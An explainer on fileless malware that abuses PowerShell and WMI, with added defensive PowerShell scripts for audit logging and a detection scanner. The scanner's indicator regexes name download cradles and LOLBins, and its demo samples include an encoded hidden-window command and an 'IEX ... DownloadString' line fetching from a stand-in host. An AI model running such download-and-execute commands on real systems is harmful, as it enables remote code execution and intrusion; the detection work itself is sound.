Over the years, we’ve all become familiar with malware and the damage that it can do, whether it manifests itself as a virus, worm, spyware, ransomware or Trojan. Our general understanding of malware is that it works by installing software on a computer without our consent.
However, a relatively new variant turns this concept on its head. As the name suggests, 'fileless' malware infiltrates a PC without any program being written to the hard drive, which makes it one of the hardest threats to spot that we've seen.
How does fileless malware work?
Fileless malware uses tools that are already built into Windows, which means that, to all intents and purposes, an attack looks like a normally running process.
In particular, it tends to use Microsoft PowerShell and Windows Management Instrumentation (WMI), feeding them commands or scripts that fetch and run the attacker's code. There is no malware program to install: the payload itself is never written to the hard drive as a file.
Instead, the code is loaded straight into the PC's memory (RAM) and runs from there. It stays there, doing its work, until the PC is rebooted. Worst of all, you probably won't have a clue that anything has happened until it's too late.
How does fileless malware get on my computer?
Fileless malware could arrive as a Word or Excel file containing a macro or link that, when enabled or clicked, launches a PowerShell script that pulls the malicious code straight into your PC's memory.
Alternatively, it could be hosted on a website that looks for vulnerabilities in a browser plugin such as Flash, allowing it to run in the memory reserved for your browser.
Fileless malware is known to be spread by phishing emails, malicious downloads and malvertising. The key thing to remember is that, although the document or web page that starts the attack may touch your disk, the malicious program itself is never installed there, which is what makes it such a tricky and insidious problem.
Why are PowerShell and WMI targeted?
Aside from being ubiquitous, these tools allow access to the heart of a computer.
PowerShell, for example, is an advanced scripting engine widely used to administer machines running Windows, which means an attacker who can run a script in memory gets the same reach over Windows features that an administrator has.
Read more: Getting Started with Windows PowerShell
It also provides full access to Microsoft COM (Component Object Model) and WMI, through which software can be installed and updated and the operating system can be queried. If the fileless malware wants to delete, copy or execute files, it can do so via WMI.
Won’t my antivirus software detect it?
Not reliably. Traditional antivirus tools are built around scanning files: they act when a suspicious file is written to the hard drive and compare it with the security software's library of known threats. With fileless malware nothing is written, so that check never fires.
What's more, the commands and applications being used are native to Windows and are, in other circumstances, legitimately used for administrative tasks, so they are trusted by default.
Newer protection fares better. Since Windows 10, the Antimalware Scan Interface (AMSI) lets security software inspect PowerShell script content as it runs in memory, and behaviour-based tools judge a process by what it does rather than by what is on disk. Even so, a carefully crafted attack can slip past both.
If nothing else, it shows how sophisticated this malware strain actually is, which only makes it more worrying.
How can I combat the threat?
One step often recommended is to open the Control Panel (search for it from the taskbar's search box), select 'Programs and Features', click the link 'Turn Windows features on or off' and untick the box next to 'Windows PowerShell 2.0'. That is worth doing, but understand what it does: it removes only the old 2.0 engine, which attackers like because it has none of the newer safeguards. The current engine (5.1) is part of Windows, cannot be removed here and shouldn't be, because it is the version your antivirus can inspect as scripts run.
You should also ensure that Windows and other programs are regularly updated, and keep a keen eye out for unusual behaviour. Rebooting clears code that lives only in memory, so restart your machine if you suspect anything odd is happening, bearing in mind that some strains plant a way to come back (see below). For most ordinary users, this should suffice.
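Rather than trying to remove PowerShell, the following script, an added example that is not from the original article, does what the Control Panel step does (removes the legacy 2.0 engine) and then turns on the logging you would need in order to notice an attack. Run it from an elevated PowerShell on Windows 10 or 11. The transcript folder C:\PSTranscripts and the function names are my own choices; the registry keys are the standard PowerShell policy keys that Group Policy writes.

```powershell
#Requires -RunAsAdministrator
# Added example (not from the original article). Removes the legacy PowerShell 2.0
# engine and enables PowerShell auditing via the same policy keys Group Policy uses.
# Assumes Windows 10/11 with the DISM cmdlets available (they ship with the OS).

$policyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Set-PolicyValue {
    # Create the policy key if needed and write one value under it.
    param([string]$SubKey, [string]$Name, $Value, [string]$Type = 'DWord')
    $path = Join-Path $policyRoot $SubKey
    if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
    New-ItemProperty -Path $path -Name $Name -Value $Value -PropertyType $Type -Force | Out-Null
}

function Disable-LegacyPowerShellEngine {
    # The 2.0 engine predates AMSI, script block logging and constrained language mode,
    # which is why attackers request it ("powershell -Version 2") to dodge all three.
    # Unticking "Windows PowerShell 2.0" in Control Panel toggles this same feature.
    $feature = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -ErrorAction SilentlyContinue
    if ($feature -and $feature.State -eq 'Enabled') {
        Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -NoRestart | Out-Null
    }
}

function Enable-PowerShellAuditing {
    param([string]$TranscriptDir = 'C:\PSTranscripts')   # assumed location, change to taste
    # Script Block Logging: every script block, including the decoded text of an
    # -EncodedCommand payload, is written to Microsoft-Windows-PowerShell/Operational
    # as Event ID 4104. This is what lets you see code that only ever lived in memory.
    Set-PolicyValue -SubKey 'ScriptBlockLogging' -Name 'EnableScriptBlockLogging' -Value 1
    # Module Logging for all modules: cmdlet invocations and their parameters (Event ID 4103).
    Set-PolicyValue -SubKey 'ModuleLogging' -Name 'EnableModuleLogging' -Value 1
    Set-PolicyValue -SubKey 'ModuleLogging\ModuleNames' -Name '*' -Value '*' -Type 'String'
    # Transcription: a plain-text record of every session. Restrict the folder's ACL
    # separately so that a local user cannot edit or delete the transcripts.
    if (-not (Test-Path $TranscriptDir)) { New-Item -ItemType Directory -Path $TranscriptDir | Out-Null }
    Set-PolicyValue -SubKey 'Transcription' -Name 'EnableTranscripting' -Value 1
    Set-PolicyValue -SubKey 'Transcription' -Name 'EnableInvocationHeader' -Value 1
    Set-PolicyValue -SubKey 'Transcription' -Name 'OutputDirectory' -Value $TranscriptDir -Type 'String'
}

function Get-PowerShellHardeningStatus {
    # Read back what was set so the result can be checked (or fed to a compliance report).
    $v2 = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -ErrorAction SilentlyContinue
    [pscustomobject]@{
        LegacyV2Engine     = if ($v2) { [string]$v2.State } else { 'NotPresent' }
        ScriptBlockLogging = (Get-ItemProperty "$policyRoot\ScriptBlockLogging" -ErrorAction SilentlyContinue).EnableScriptBlockLogging -eq 1
        ModuleLogging      = (Get-ItemProperty "$policyRoot\ModuleLogging" -ErrorAction SilentlyContinue).EnableModuleLogging -eq 1
        Transcription      = (Get-ItemProperty "$policyRoot\Transcription" -ErrorAction SilentlyContinue).EnableTranscripting -eq 1
        LanguageMode       = [string]$ExecutionContext.SessionState.LanguageMode
    }
}

Disable-LegacyPowerShellEngine
Enable-PowerShellAuditing
Get-PowerShellHardeningStatus | Format-List
```

After this runs, new 4104 events appear in Event Viewer under Applications and Services Logs, Microsoft, Windows, PowerShell, Operational. The LanguageMode field will still read FullLanguage: Constrained Language Mode, which stops scripts calling into COM and .NET the way the article describes, is switched on by an AppLocker or Windows Defender Application Control policy rather than by a registry value, so it is reported here but not set.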
So why doesn’t everyone disable PowerShell?
It's not an issue for Windows Home users, but PowerShell and WMI are crucial for the smooth running of many company IT departments, and preventing their use could have an adverse effect on productivity.
To that end, if businesses decided to ban PowerShell, it would severely disrupt many day-to-day tasks carried out by IT professionals. Besides, PowerShell isn't the only route in: Microsoft Word macros can be leveraged, browsers can be made to run malicious code, and built-in Windows programs such as Rundll32, Mshta (which runs HTML Applications) and the Windows Script Host (which runs VBScript) also offer a point of entry.
How big a problem is fileless malware, though?
According to a report from security company SentinelOne, the first six months of 2018 saw a 94% rise in fileless malware attacks, and it's continuing to get worse.
In June 2018, there were a record 5.2 PowerShell attacks per 1,000 PCs, up from 2.5 attacks in May. It's only a matter of time before fileless malware grows from something that primarily affects businesses to a blight that impacts us all.
Is anything being done about it?
Security experts are looking at the best ways to tackle the problem, but it isn't easy. Aside from disabling PowerShell and WMI (with all the associated problems), there's a suggestion that IT departments should use software to review security logs, looking for signs such as unusually high volumes of data leaving the network, though by then this could be closing the proverbial barn door after the horse has bolted.
More encouraging is the use of machine learning to spot particular kinds of activity as they happen, so the malware can be stopped in its tracks.
That would certainly be preferable to having security professionals review logs manually for signs of suspicious behaviour. If you want to see how hard it is to solve a fileless malware attack, complete the quiz on McAfee's website.
Can the malware spread easily?
Yes, it can. Using WMI, an attacker can spread the threat to other PCs on a network by getting those computers to run malicious code that never gets saved to their hard drives.
It can then become a race against time to sort out the issue and check the damage. Worse, fileless malware is becoming so sophisticated that some strains plant a script in the Registry, which reloads the malicious code into memory after an infected computer is powered down and rebooted.
Other strains combine the technique with ransomware, encrypting data once they are running in memory, which could prove devastating.
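The log review suggested a few answers back, and the Registry persistence just described, can be checked with the same scoring logic. The script below is an added example, not from the original article or any vendor: it scores command text for the switches and download cradles that memory-only attacks rely on, then applies that score to PowerShell script block logs (Event ID 4104, which exist only where Script Block Logging is on), to the command lines of running script hosts queried through WMI (the same interface the article describes attackers using), and to the Registry Run keys. The indicator list, weights, thresholds and function names are my own choices, and the sample strings at the end are constructed for the demonstration rather than taken from any incident.

```powershell
# Added example (not from the original article). Triage for memory-resident script
# activity on Windows. Assumes Windows PowerShell 5.1 or PowerShell 7 on Windows.
# The offline demonstration at the bottom uses constructed strings only.

# Indicators commonly seen when code is staged in memory. Admins use some of these
# legitimately, so the combined score, not any single hit, drives the decision.
$Indicators = @(
    [pscustomobject]@{ Name = 'EncodedCommand';   Weight = 4; Pattern = '(?i)-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}' }
    [pscustomobject]@{ Name = 'InvokeExpression'; Weight = 3; Pattern = '(?i)\b(iex|invoke-expression)\b' }
    [pscustomobject]@{ Name = 'WebDownload';      Weight = 3; Pattern = '(?i)(downloadstring|downloadfile|invoke-webrequest|net\.webclient)' }
    [pscustomobject]@{ Name = 'ReflectiveLoad';   Weight = 4; Pattern = '(?i)(reflection\.assembly|virtualalloc|createthread)' }
    [pscustomobject]@{ Name = 'Base64Decode';     Weight = 2; Pattern = '(?i)frombase64string' }
    [pscustomobject]@{ Name = 'HiddenWindow';     Weight = 2; Pattern = '(?i)-w(indowstyle)?\s+hidden' }
    [pscustomobject]@{ Name = 'BypassPolicy';     Weight = 2; Pattern = '(?i)-e(x|p|xecutionpolicy)?\s+bypass' }
    [pscustomobject]@{ Name = 'NoProfile';        Weight = 1; Pattern = '(?i)-nop(rofile)?\b' }
    [pscustomobject]@{ Name = 'ScriptHost';       Weight = 2; Pattern = '(?i)\b(mshta|rundll32|regsvr32|wscript|cscript)(\.exe)?\b' }
)

function Get-ScriptThreatScore {
    # Return the total weight and the names of the indicators present in one piece of text.
    param([Parameter(Mandatory)][AllowEmptyString()][string]$Text)
    $score = 0
    $names = [System.Collections.Generic.List[string]]::new()
    foreach ($i in $Indicators) {
        if ($Text -match $i.Pattern) { $score += $i.Weight; $names.Add($i.Name) }
    }
    [pscustomobject]@{ Score = $score; Indicators = $names.ToArray() }
}

function Find-SuspiciousScriptBlock {
    # Script block logs (Event ID 4104) hold the decoded text of what actually ran,
    # even when it arrived as -EncodedCommand. Needs Script Block Logging enabled.
    param([int]$MaxEvents = 500, [int]$Threshold = 5)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction Stop | ForEach-Object {
        $r = Get-ScriptThreatScore -Text $_.Message
        if ($r.Score -ge $Threshold) {
            [pscustomobject]@{ Time = $_.TimeCreated; Score = $r.Score; Indicators = ($r.Indicators -join ','); Text = $_.Message }
        }
    }
}

function Find-SuspiciousScriptHost {
    # Live processes via WMI/CIM: a hidden powershell.exe with an encoded command line is
    # the memory-resident stage the article describes, and WMI will happily list it.
    # A bare launcher (mshta.exe with nothing suspicious) scores 2 and is not reported.
    param([int]$Threshold = 3)
    $wql = "Name LIKE 'powershell%' OR Name = 'pwsh.exe' OR Name = 'mshta.exe' OR Name = 'rundll32.exe' OR Name = 'wscript.exe' OR Name = 'cscript.exe'"
    Get-CimInstance -ClassName Win32_Process -Filter $wql | ForEach-Object {
        $r = Get-ScriptThreatScore -Text ([string]$_.CommandLine)
        if ($r.Score -ge $Threshold) {
            [pscustomobject]@{ ProcessId = $_.ProcessId; Parent = $_.ParentProcessId; Score = $r.Score; Indicators = ($r.Indicators -join ','); CommandLine = $_.CommandLine }
        }
    }
}

function Find-SuspiciousAutorun {
    # The Run/RunOnce keys are the usual place a fileless strain hides the one-liner
    # that reloads its payload into memory at every logon.
    param([int]$Threshold = 3)
    $keys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
            'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
            'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
            'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    foreach ($k in $keys) {
        $props = Get-ItemProperty -Path $k -ErrorAction SilentlyContinue
        if (-not $props) { continue }
        foreach ($p in $props.PSObject.Properties) {
            # Get-ItemProperty adds provider bookkeeping properties; skip those.
            if ($p.Name -in 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider') { continue }
            $r = Get-ScriptThreatScore -Text ([string]$p.Value)
            if ($r.Score -ge $Threshold) {
                [pscustomobject]@{ Key = $k; Name = $p.Name; Score = $r.Score; Indicators = ($r.Indicators -join ','); Value = $p.Value }
            }
        }
    }
}

# Offline demonstration with constructed samples (not taken from any real incident).
# The base64 in the first decodes to "IEX (New-Object Net.WebClient)", the opening of a
# typical download cradle; the last is an ordinary admin command that should score zero.
$samples = @(
    'powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA'
    'IEX (New-Object Net.WebClient).DownloadString(''http://example.invalid/stage'')'
    'Get-ChildItem C:\Logs -Filter *.log | Where-Object Length -gt 1MB'
)
foreach ($s in $samples) {
    $r = Get-ScriptThreatScore -Text $s
    '{0,2}  {1,-45}  {2}' -f $r.Score, ($r.Indicators -join ','), $s.Substring(0, [Math]::Min(55, $s.Length))
}
```

The constructed samples score 9, 6 and 0 respectively. On a real machine you would then run Find-SuspiciousScriptHost and Find-SuspiciousAutorun (both work on any Windows 10 or 11 host) and Find-SuspiciousScriptBlock (which needs Script Block Logging to have been enabled beforehand); pipe each through Format-List to see the full command text. Treat the output as a triage queue rather than a verdict: the weights are deliberately simple, and a legitimate deployment script can trip several of them.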
Scary. However, I have a Mac, so am I OK?
Mostly, for now. Fileless attacks are overwhelmingly aimed at Windows, partly because far more computers run it and partly because PowerShell and WMI are such convenient tools for attackers.
That doesn't mean Apple Macs can't be affected. Nothing about the technique is Windows-specific: macOS ships its own scripting interpreters (the shell, AppleScript via osascript and, for many years, Python), and the same trick of driving built-in tools from memory works there too. You can expect attackers' attention to grow as the platform's popularity does.
HOW IS FILELESS MALWARE BEING USED?
Fileless malware attacks don't often hit the headlines, but that's mainly because it's a relatively recent phenomenon. Last April, however, it was reported that a hacker had targeted at least eight cash machines in Russia, getting away with a jaw-dropping $800,000 (about £610,000).
The theft appeared to baffle those monitoring the CCTV footage because the hacker seemed able to withdraw lots of cash without even touching the ATM.
The mystery was solved when researchers found a log file pointing to a fileless attack. There was no sign of any malware files on the ATM or the bank networks.